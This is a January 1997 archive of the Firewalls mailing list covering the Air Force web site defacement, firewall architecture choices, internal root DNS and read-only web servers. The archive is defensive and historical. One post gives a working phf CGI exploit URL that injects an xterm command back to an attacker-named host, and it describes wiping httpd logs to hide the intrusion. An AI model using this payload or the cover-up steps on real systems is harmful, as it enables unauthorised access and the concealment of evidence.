H6F+ciQgA/AgICEzIBM35HP3CoUYcCggaRhxJZIAwCPw7ywhMhELcTKTZjABAaAqwHc5th9hHyIo CJAg8SKQbXx0cCQgMjEfgAVAEgBj+zBAE3BsKxA0cQqFBaA02P5vMOA9sRhwMBACICWDB0DXGAAH 4ABweTUSZwqFJEL/KfIlMQQQK8AGMQNSIBMIYP0u8GkNsC8QAJAyoiKwCoXedzAQNwgwRwqFVCAx KsCvH7ADIECxEfBjCHF0IAD/FnArkCrAJXEEAEChIsADoP8zeAuAOXIrcTDgICJIVxyQcGV4aWIx kiAAAHBkfyo2H2AggEPhB0BJMT7wSf9KckoBN1AicTVxJUcHgAqF7yCzICNMxUlAL04bT3EDoHMj cDm3ZHUysCyUNABv/zIRQKIHgCiRK7AH0B8iN+L/NFAq0UXWLQARsEnyV0AgAP81cTS0JdFU4EPB PFElkjQQX0XGICMqsiExP+BkREIoT1dEH/VGQCAAZG8HkG72J0XGFPFwKUAFQEHBIvDvS8QjwyHS BCBnO4If0ANg/yEQCoUA0FaRBCBFVCAxU0L9AJBtC1BJUVTzLLIhARTwvnIKhRgAN1FD4UceUz9B /zcwNPJedR/QIlEu8SHzAYD5XZBkYSVgQVE8jDhFWjT/GHBGQBURQcMfIkTFX/spAaM+UykAUnNo KQBPYEHnKJFi0inbc3AFkAaQNFD/IvFs8lURKHA68B+ABBAHkb4oLSEDoDhiRMEKhWoiAMsxYD6y PyacUmVfQAsgvzmmZJY3wDARBzADoFMBkNsRsCTGTB9gJBFTKHANsBZuCoUXkQB2sAMAEBAAAAAA AwAREAAAAABAAAcwQBJdnKj4uwFAAAgw0O4ddK34uwEeAD0AAQAAAAUAAABSZTogAAAAAAMADTT9 NwAAn70= ------ =_NextPart_000_01BBF8B5.F54501D0-- From firewalls-owner Thu Jan 2 06:29:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA27841 for firewalls-outgoing; Thu, 2 Jan 1997 06:23:53 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA27830 for ; Thu, 2 Jan 1997 06:23:46 -0800 (PST) Received: by smartwall.v-one.com; id JAA04533; Thu, 2 Jan 1997 09:20:05 -0500 (EST) Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma004524; Thu, 2 Jan 97 09:19:58 -0500 Received: from peg.v-one.com (user@securewall.v-one.com [10.6.0.11]) by securemail.v-one.com (8.7.4/8.7.3) with SMTP id JAA24766; Thu, 2 Jan 1997 09:29:31 -0500 (EST) Message-Id: <2.2.32.19970102141837.0068cea8@localhost> X-Sender: pmcmahan@localhost X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 02 Jan 1997 09:18:37 -0500 To: Sebastian Stache , "'Firewalls@GreatCircle.COM'" From: Peg McMahan Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >So, did the hacked hosts have ftp daemons >running, with the firewall allowing outside >access? Telnet? Rsh? Or are there html >specific inherent weaknesses (even without >java etc)? Yes. It's called cgi-bin. (to mention just one of the many inherent httpd problems.... and cgi is my favourite to pick on) ____________________________________________________________________ Margaret H. McMahan - Systems Engineer pmcmahan@v-one.com "Know your faults, know your friends, Be prepared to take revenge" From firewalls-owner Thu Jan 2 06:50:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA28080 for firewalls-outgoing; Thu, 2 Jan 1997 06:31:12 -0800 (PST) Received: from uibk.ac.at (ms.uibk.ac.at [138.232.1.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA28072 for ; Thu, 2 Jan 1997 06:31:01 -0800 (PST) Received: from cpq229-rz (cpq229-rz.uibk.ac.at) by uibk.ac.at with SMTP id AA17133 (5.65c/IDA-1.4.4 from matic@bau2.uibk.ac.at for ); Thu, 2 Jan 1997 15:30:10 +0100 Message-Id: <32CBC671.1639@bau2.uibk.ac.at> Date: Thu, 02 Jan 1997 15:30:09 +0100 From: Markus H|bner Organization: NET Design X-Mailer: Mozilla 3.01 (Win16; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Security & Hackerscene site Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk During the last days the site "Security & Hackerscene" has been expanded. New sections specialized on intrusion detection, IP-spoofing, ... will help you to protect your site from break-ins and will give you an insight into the latest methods and tricks used by hackers to break into obvious secure computers. Furthermore many CERT advisories and other security related text files were redesigned and are now available in HTML format. You will also find links to the best information resources (files, e-zines, texts) on the net regarding Internet-Security. URL of the "Security & Hackerscene" site: -------------------------------------------------------------- http://www.geocities.com/capecanaveral/3498/security.htm -------------------------------------------------------------- Some of the items you will find: + IP-spoofing demystified + Intrusion Detection Checklist + CGI Security Holes + How hackers cover their tracks + Compromise FAQ + Protecting Yourself from Password File Attacks + The Ultimate Sendmail Hole List + An Architectural Overview of UNIX Network Security + Essential Security Information + UNIX Backdoors + UNIX System Security Issues + Tips for Improving Your Security + as well as files commonly found in the underground scene. I would be glad to receive your feedback. Markus H|bner ====================================================================== E-Mail: matic@bau2.uibk.ac.at WWW: http://bau2.uibk.ac.at/matic Working as a freelance WEB-programmer and security-consultant. From firewalls-owner Thu Jan 2 07:42:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA01690 for firewalls-outgoing; Thu, 2 Jan 1997 07:21:40 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA01672 for ; Thu, 2 Jan 1997 07:21:29 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id KAA29577; Thu, 2 Jan 1997 10:20:44 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id KAA11357; Thu, 2 Jan 1997 10:20:42 -0500 (EST) Date: Thu, 2 Jan 1997 10:20:42 -0500 (EST) Message-Id: <199701021520.KAA11357@SPARKY.CF.CS.YALE.EDU> To: bstone@smtpgw.adtdata.com, ddrew@mci.net, genel@inforamp.net, mark@hercules.reno.nv.us Subject: RE: Air Force Web Site Hacked -Reply Cc: cklaus@iss.net, firewalls@GreatCircle.COM, midengre@stetson.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gene Lee wrote: >Slackware Linux has a useable filesystem on CD-ROM, however the boot >partition still has to be HD or Floppy. One thing that puzzles me about >bootable media is if you have a bootable CD, how does it install the >drivers for itself to read from the CD to actually start reading the boot >sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, >but >I'm no PC guru... RedHat 4.0 has a bootable 'live' Linux filesystem on CDROM. I've booted it on HP PC Vectras -- though the install itself doesn't work well if the CDROM was booted from so I always boot from the floppy to do a RedHat 4.0 install. Also the NT 4.0 installation CDROMs can be booted on certain supported CDROM drives ("El Cerrito" is one CDROM name I remember from the 4.0 beta). HP also distributes a CDROM with diagnostic and RAID array tools for its enterprise server PCs ( ie. NetServer LS, etc.) called HP Navigator which is bootable on the NetServer CDROM drive. - Morrow From firewalls-owner Thu Jan 2 07:44:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02482 for firewalls-outgoing; Thu, 2 Jan 1997 07:34:18 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA02462 for ; Thu, 2 Jan 1997 07:34:11 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id KAA00612; Thu, 2 Jan 1997 10:33:42 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id KAA11384; Thu, 2 Jan 1997 10:33:39 -0500 (EST) Date: Thu, 2 Jan 1997 10:33:39 -0500 (EST) Message-Id: <199701021533.KAA11384@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, zeb@sbbs.se Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sebastian Stache wrote: >I'm getting unnerved by the fact that not only >have those sites indeed been hacked, but noone >seems to be surpised. > >What techniques were used? To alter the html >files, someone obviously managed to achieve >file overwrite rights (at the very least). You'd be surprised at how many NCSA httpd sites are still out there which are vulnerable to the attack: netscape 'http://www.victim.com/cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0' Once you have an interactive shell (as an open window on your display) running at the userid the http server (httpd daemon) is running under you can usually then overwrite the httpd logs in the logfile directory to erase any trace of your intrusion. Then you will often find that the htdocs subdirectory is either owned by you or that it has fairly liberal permissions. And of course, once you are logged in on a machine you can bring over all of the hacker toolkits to automate breaking 'root' -- COPS, crack, "rootkit" (various exploit scripts), etc. Given enough time I'd give most intruders who have managed to login via telnet a pretty good chance ( > 50% ) of breaking maximum security on most Unix systems (ie. gain 'root' privileges). - Morrow From firewalls-owner Thu Jan 2 08:23:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA04598 for firewalls-outgoing; Thu, 2 Jan 1997 08:04:48 -0800 (PST) Received: from gateway.segue.com (gateway.segue.com [192.12.233.12]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA04587 for ; Thu, 2 Jan 1997 08:04:36 -0800 (PST) Received: (from news@localhost) by gateway.segue.com (8.7.1/8.7.1) id LAA29918 for ; Thu, 2 Jan 1997 11:04:06 -0500 (EST) X-Authentication-Warning: gateway.segue.com: news set sender to using -f Received: from segue1.segue.com(192.12.23.1) by gateway.segue.com via smap (V1.3) id sma029914; Thu Jan 2 11:03:50 1997 Received: from [192.12.23.174] (natick.segue.com [192.12.23.174]) by segue1.segue.com (8.7.1/8.7.1) with SMTP id LAA12392 for ; Thu, 2 Jan 1997 11:03:49 -0500 (EST) Message-Id: <199701021603.LAA12392@segue1.segue.com> To: "Firewalls@GreatCircle.COM" Subject: Making a case for Firewall design Date: Thu, 02 Jan 97 10:59:58 -0500 From: Rich Lenihan X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm trying to make a case for a firewall design. I've narrowed the choices down to two options. Option A looks like: internal internal dual-homed external network --- filtering --- bastion host with --- filtering --- internet router TIS toolkit router option B looks like: internal internal bastion host(s) external network --- "firewall" | filtering --- internet system* ---- DMZ network ---- router *(Cisco PIX or similar device) With both options, we would need to proxy or masquerade all internal connections to the internet (we use private IP addresses). I'm pretty sure both options would give us what we want (internet connectivity + security). The trade-offs I see are the lower cost of A (most of the pieces are already in place) vs. the ease of use and extensibility of B. My own preference is for option B but I'll need some backup before I can make a case for spending $10K+. Has anyone else made or seen such a (third-party) analysis before? I have the O'Reilly Firewalls book but they don't really cover option B. Thanks... -Rich -- Rich Lenihan System/Network Administrator rich@segue.com 617.796.1247 (voice) 617.796.1610 (fax) Segue Software, Inc. 1320 Centre Street Newton Centre, MA 02159 USA From firewalls-owner Thu Jan 2 09:31:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA08163 for firewalls-outgoing; Thu, 2 Jan 1997 08:48:18 -0800 (PST) Received: from simtel.Coast.NET (simtel.coast.net [205.149.128.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA08108 for ; Thu, 2 Jan 1997 08:47:51 -0800 (PST) Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0vfqI5-0000vmC; Thu, 2 Jan 97 11:46 EST Date: Thu, 2 Jan 1997 11:46:48 -0500 (EST) To: long-morrow@CS.YALE.EDU Cc: Firewalls@GreatCircle.COM, zeb@sbbs.se Subject: Re: Air Force Web Site Hacked In-Reply-To: <199701021533.KAA11384@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Jan 2, 97 10:33:39 am From: "Mike O'Connor" Reply-To: "Mike O'Connor" X-Organization: :noitazinagrO-X Message-Id: <970102114649.mjo@dojo> Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk :>I'm getting unnerved by the fact that not only :>have those sites indeed been hacked, but noone :>seems to be surpised. :> :>What techniques were used? To alter the html :>files, someone obviously managed to achieve :>file overwrite rights (at the very least). : :You'd be surprised at how many NCSA httpd sites are :still out there which are vulnerable to the attack: [more about the phf bug] There's no reason to believe that the compromise to www.af.mil occured through any weakness in the WWW server software/machine in particular. I just did some cursory checking -- "server.af.mil" is running sendmail 5.59(!) and "ddn.af.mil" is running NFS (no exports list, perhaps a default portmap though). And it could always be an inside job... ...Mike -- Michael J. O'Connor mjo@dojo.mi.org "...and life begins at 40 -- so they promise" -John Lennon From firewalls-owner Thu Jan 2 09:35:10 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA08848 for firewalls-outgoing; Thu, 2 Jan 1997 08:55:29 -0800 (PST) Received: from honcho.columbiasc.ncr.com ([153.78.17.231]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA08796 for ; Thu, 2 Jan 1997 08:55:13 -0800 (PST) Received: from exchsmtp.ColumbiaSC.NCR.COM (exchsmtp.ColumbiaSC.NCR.COM [153.78.122.72]) by honcho.columbiasc.ncr.com (8.6.12/8.6.12) with SMTP id LAA09391 for ; Thu, 2 Jan 1997 11:54:38 -0500 Received: by exchsmtp.ColumbiaSC.NCR.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8A3.BA2F4B80@exchsmtp.ColumbiaSC.NCR.COM>; Thu, 2 Jan 1997 11:54:36 -0500 Message-ID: From: "Caldwell, Matt COLASC" To: "firewalls@GreatCircle.COM" , "owl@owlsnest.com" Subject: RE: Is Your Website a Secret? Date: Thu, 2 Jan 1997 11:52:00 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- From: owl@owlsnest.com To: firewalls@GreatCircle.COM Subject: Is Your Website a Secret? Date: Tuesday, December 31, 1996 9:22PM Is your web site the best kept secret on the Internet? We'll promote it to 50 search engines and indexes for $85 and complete the job in 2 business days. Satisfaction is guaranteed! SPAM DELETED Matt Caldwell - Security / Unix Administrator --------------------------------------------- NCR / Mosaic Computing Inc. matt.caldwell@columbiasc.ncr.com matt.caldwell@mosaic-comp.com Office: 803-939-2322 --------------------------------------------- From firewalls-owner Thu Jan 2 09:44:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA11297 for firewalls-outgoing; Thu, 2 Jan 1997 09:27:06 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA11290 for ; Thu, 2 Jan 1997 09:26:58 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id LAA15652 for ; Thu, 2 Jan 1997 11:31:34 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id LAA13244 for ; Thu, 2 Jan 1997 11:25:30 -0600 Message-Id: <199701021725.LAA13244@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp013242; Thu Jan 2 11:25:29 1997 Date: Thu, 2 Jan 1997 11:25:00 -0600 From: "Hicks, Rick" Subject: RE: DNS Proxy and Internal Root Name Ser To: "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Problem: >>One problem I thought of concerns the mitigation between the internal >>root name server and the forwarders/slave lines. If a subordinate >>domain name server queries the root name server for an "outside" domain, >>how would it know to forward the query to the proxy (being that it is a >>internal root name server)? I could have my subordinate top-level >>domain name serves query the proxy directly by putting forwarders line >>in it's /etc/named.boot, however, this would bypass the internal root >>structure. It seems to be straight forward w/o an internal root name >>server, however, I need to maintain these root name server. Can anyone >>help. >The problem with an internal root server is that it wont take any account >of your forwarders & slave options because it is said to be a root server. >The only solution I think of is adding the noforward patch in the named >daemons of the first level name servers you have under your root server. >You just have to specify all the domains known by your internal root >nameserver >so that your lower level nameserver would query it but would forward to your >proxy for everything else. The solution to both of these issues is to have a host running as you're internal *root* nameserver, and NOTHING else. The root only needs to have references to hosts that are authoritative for the domain(s), they do not need to be, or should be, nameservers for a domain. This way you're internal servers will believe that they are authoritative for the domain, but still forward unresolvable queries to the *forwarders* host. The forwarders host should be the *firewall* running as a primary, secondary, or caching server (if you're upstream provider is authoritative for you're zone) with a true root.db to resolve external hosts. This works quite well, as I have been doing it for almost a year without problems. Rick ________________________________________________ Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com From firewalls-owner Thu Jan 2 10:38:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14933 for firewalls-outgoing; Thu, 2 Jan 1997 10:08:47 -0800 (PST) Received: from seeker.hermesnet.net (seeker.hermesnet.net [205.177.6.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA14924 for ; Thu, 2 Jan 1997 10:08:39 -0800 (PST) Received: from owl-ppp.hermesnet.net (mortar.dsava.com [192.234.181.161]) by seeker.hermesnet.net (8.8.4/8.8.4) with SMTP id NAA12891; Thu, 2 Jan 1997 13:05:52 -0500 (EST) Message-Id: <199701021805.NAA12891@seeker.hermesnet.net> X-MAPI-MessageClass: IPM To: rich@segue.com Cc: firewalls@greatcircle.com X-Mailer: FTP Software Internet Mail 2.0 MIME-Version: 1.0 From: Don Flint Subject: RE: Making a case for Firewall design Date: Thu, 02 Jan 1997 13:04:21 -0500 Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Reply to your message of 1/2/97 12:42 PM >> >>I'm trying to make a case for a firewall design. I've narrowed the choic= es >>down to two options. Option A looks like: >> >>=20 >> internal internal dual-homed external=20 >> network --- filtering --- bastion host with --- filtering --- intern= et >> router TIS toolkit router >> >>option B looks like: >> >> internal internal bastion host(s) external=20 >> network --- "firewall" | filtering --- internet >> system* ---- DMZ network ---- router >> >>*(Cisco PIX or similar device) >> >>With both options, we would need to proxy or masquerade all internal >>connections to the internet (we use private IP addresses). I'm pretty su= re >>both options would give us what we want (internet connectivity + securit= y). >>The trade-offs I see are the lower cost of A (most of the pieces are alr= eady >>in place) vs. the ease of use and extensibility of B. My own preference = is >>for option B but I'll need some backup before I can make a case for spen= ding >>$10K+.=20 >> >>Has anyone else made or seen such a (third-party) analysis before? I hav= e >>the O'Reilly Firewalls book but they don't really cover option B. Rich: Have you thought about some of the other commercial products rather than ju= st the TIS toolkit or the router/DMZ approach? There are several very good= ones produced for a variety of platforms. Price has always been an object= ion, but now many of them are available for the same cost as the range you = mentioned for the router/DMZ. They offer improved security over the router= /DMZ approach as well. What ever route you decide to go, best of luck. Don Flint =09 From firewalls-owner Thu Jan 2 10:38:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA15398 for firewalls-outgoing; Thu, 2 Jan 1997 10:14:50 -0800 (PST) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA15379 for ; Thu, 2 Jan 1997 10:14:37 -0800 (PST) Received: (from rachel@localhost) by cohiba.predictive.com (8.7.6/8.7.3) id NAA15030 for Firewalls@GreatCircle.COM; Thu, 2 Jan 1997 13:14:28 -0500 From: Rachel Rosencrantz Message-Id: <199701021814.NAA15030@cohiba.predictive.com> Subject: read only disks To: Firewalls@GreatCircle.COM Date: Thu, 2 Jan 1997 13:14:28 -0500 (EST) In-Reply-To: <199701020900.BAA15175@miles.greatcircle.com> from "Firewalls-Digest" at Jan 2, 97 01:00:28 am Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest said: > From: "Jason T. Luttgens" > Subject: RE: Air Force Web Site Hacked > > I do think read-only media is an interesting idea, by the way :) Dale is > right though, there are still vulnerabilities. Personally, I like the idea > of marking the files immutable myself. This way, even root can't change the > content unless the machine is brought down into single-user mode. Not sure > how many other operating systems support this other than (the great) BSDI > though. > I think that pretty much all OS's should have the Read only option on mounting file systems. CD roms usually like you to mount them read only. However, if one can break into root the disk could be unmounted and mounted without shutting down. If the system was also taking in data ( such as forms input, and of course the access logs) one could put that data on a read write file system. This does not remove the underlying problem that these break ins point to, but it might make it slightly harder to make it publically visable that someone was caught with their proverbial pants down. Now the ideal thing from the read only perspective (if you thought this was a way to go) would be if there was some device that was only writable in a special machine (like a cd-rom) but could be rewritten (like a disk) by that machine. Then you could have the read only information mounted from the device that can only read it, and when the web master wanted to modify it they could unmount it, pop it in the modification machine, and make the changes, and re-mount it (actually you'd probably want 2 copies of the "disk". One would be in the mod machine (not on the net) and could make it easy to sit down and make the changes, and once they are finished the disks could be swapped (the second one updated) and there would be a minimum of web page down time. My understanding of CD's is that they wouldn't work this way since the data is more "etched" in the the disk somewhat like a record. -Rachel From firewalls-owner Thu Jan 2 11:29:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17753 for firewalls-outgoing; Thu, 2 Jan 1997 10:37:41 -0800 (PST) Received: from honcho.columbiasc.ncr.com ([153.78.17.231]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA17681 for ; Thu, 2 Jan 1997 10:37:20 -0800 (PST) Received: from exchsmtp.ColumbiaSC.NCR.COM (exchsmtp.ColumbiaSC.NCR.COM [153.78.122.72]) by honcho.columbiasc.ncr.com (8.6.12/8.6.12) with SMTP id NAA23587 for ; Thu, 2 Jan 1997 13:36:18 -0500 Received: by exchsmtp.ColumbiaSC.NCR.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8B1.EE6C10A0@exchsmtp.ColumbiaSC.NCR.COM>; Thu, 2 Jan 1997 13:36:17 -0500 Message-ID: From: "Caldwell, Matt COLASC" To: Jim Truitt , Paul Ferguson Cc: "firewalls@GreatCircle.COM" Subject: Security Adminstrators: Web of Trust Date: Thu, 2 Jan 1997 13:35:00 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- From: Jim Truitt To: Paul Ferguson Cc: firewalls@GreatCircle.COM Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) Date: Wednesday, January 01, 1997 3:32PM [snip] >So, what can you do? Log, log, log. And more logging. And get >to know the security administrator upstream from you. > >- paul [snip] This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security Maybe what we need is our own group that promotes trust between each other and lets us get to gether as professionals. or a web site etc.. admins. Just a thought. Jim truitt From firewalls-owner Thu Jan 2 11:30:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA21291 for firewalls-outgoing; Thu, 2 Jan 1997 11:20:52 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA21256 for ; Thu, 2 Jan 1997 11:20:35 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id NAA05692; Thu, 2 Jan 1997 13:25:07 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id NAA13922; Thu, 2 Jan 1997 13:19:02 -0600 Message-Id: <199701021919.NAA13922@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp013915; Thu Jan 2 13:18:52 1997 Date: Thu, 2 Jan 1997 13:19:00 -0600 From: "Hicks, Rick" Subject: RE: DNS Proxy and Internal Root Name Ser To: Jean-Francois ZWOBADA , "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Sorry... That's probably due to my poor english but I must confess I mised >something in your explanation... "The root only needs to >>have references to hosts that are authoritative for the domain(s), they >>do not need to be, or should be, nameservers for a domain." >What do you mean exactly ? I guess I should explain the assumptions I made. I assumed that you have internal nameservers for you're domain that are not listed as authoritative with InterNIC. I also assumed that you have already set up an internal *root* nameserver situation that will spoof the internal servers into believing that they are authoritative for the domain even though they cannot, or you don't want them to, communicate with true Internet root nameservers. What I have just explained is what I and many other people have setup. The difference I saw was this: You are using you're internal *root* nameserver to resolve queries. The internal *root* should not have host data in it and should not be used to resolve names. It should run with references to the internal nameservers and be listed in these internal nameserver's root.db (or root.cache) file. No client should be using it for name resolving; they should use the other nameservers that you have setup as primary and secondaries. If my assumptions are incorrect let me know. Also, it may be that you have confused the terms 'root' and 'primary' when it comes to nameservers. Please check to see that this is not the case. Rick ________________________________________________ Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com From firewalls-owner Thu Jan 2 11:33:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA19024 for firewalls-outgoing; Thu, 2 Jan 1997 10:48:24 -0800 (PST) Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA19006 for ; Thu, 2 Jan 1997 10:48:12 -0800 (PST) Received: by kotuku.manukau.govt.nz id <35721>; Fri, 3 Jan 1997 07:59:07 +1300 Message-Id: <97Jan3.075907nzdt.35721@kotuku.manukau.govt.nz> From: Matthew Thompson To: "'Brian Stone'" Cc: "firewalls@GreatCircle.COM" Subject: RE: Air Force Web Site Hacked -Reply Date: Sat, 4 Jan 1997 09:42:42 +1300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The standard's called El Torito, bootable CD-ROM, it requires PC BIOS support, many newer PCs support this, and you can add an Adaptec card and SCSI CD-ROM to an older PC for this support. Windows NT4 is probably the most common example of a PC bootable CD-ROM available today. NT and Unix can be placed in ROM, but I'd suspect most implementations create a ramdisk for temporary use, and it still does not stop someone modifying programs in RAM (buffer overruns etc). However facing an almost totally read only machine, running nothing but a webserver would probably make many crackers go away and look for a softer target. You could also automate monitoring of the audit log, and murder any processes which start writing, or attempting to write in areas they shouldn't (including the RO file systems) and/or initiate a system shutdown or restart in this instance. Most people I'm sure would rather have a webserver off the air, than full of kiddy porn... >Compaq Corp. provides a bootable "Smart Start" OS installation CD with >every Proliant 5000 (many people are using these as >Netware/IntranetWare or NT file/print/app/web servers). I'm not sure >how they do it, I believe its a function of the BIOS that "knows" about the >CD as a bootable media (probably searches A:, C:, D: etc. for boot files) if >nothing is in A: and the hard disk isn't partioned/formatted yet it boots >from the CD and steps you through installing the rest of the drivers (hard >drive/NIC/etc.) and the OS you purchased! It's cool and I think they've >been doing it for awhile. >Brian Stone >bstone@KnowledgeSoft.com >>>> Gene Lee 12/31/96 04:00pm >>> >On Tuesday, December 31, 1996 2:41 PM, Mark >Johnson[SMTP:mark@hercules.reno.nv.us] wrote: >>I have not set one up yet(Planned for July), but I believe you can have >>a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >>and all data on CDROM so you would not have any writable media. >> >>Can anyone confirm of deny my thoughts? >Slackware Linux has a useable filesystem on CD-ROM, however the boot >partition still has to be HD or Floppy. One thing that puzzles me about >bootable media is if you have a bootable CD, how does it install the >drivers for itself to read from the CD to actually start reading the boot >sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, >but >I'm no PC guru... From firewalls-owner Thu Jan 2 12:04:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17756 for firewalls-outgoing; Thu, 2 Jan 1997 10:37:43 -0800 (PST) Received: from hermes.cu-online.com (hermes.cu-online.com [205.198.248.82]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA17723 for ; Thu, 2 Jan 1997 10:37:27 -0800 (PST) Received: from argus.cu-online.com (argus.cu-online.com [206.185.2.72]) by hermes.cu-online.com (8.7.5/8.7.5-cuo-s6) with SMTP id MAA06910 for ; Thu, 2 Jan 1997 12:41:26 -0600 (CST) Received: by argus.cu-online.com (SMI-8.6/SMI-SVR4) id MAA21415; Thu, 2 Jan 1997 12:41:29 -0600 Date: Thu, 2 Jan 1997 12:41:29 -0600 From: mcnabb@argus.cu-online.com (Paul McNabb) Message-Id: <199701021841.MAA21415@argus.cu-online.com> To: Firewalls@GreatCircle.COM Subject: Read-only Web Site (was AF hack) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There has been some discussion of putting a web site on read-only media to protect it against attack, with the drawback being that updating the web site becomes tedious. Three solutions have been proposed: 1) using the immutable bit (for BSD only), 2) using CDROM, and 3) using READ-ONLY file systems. There is another solution that is being used by some sites, 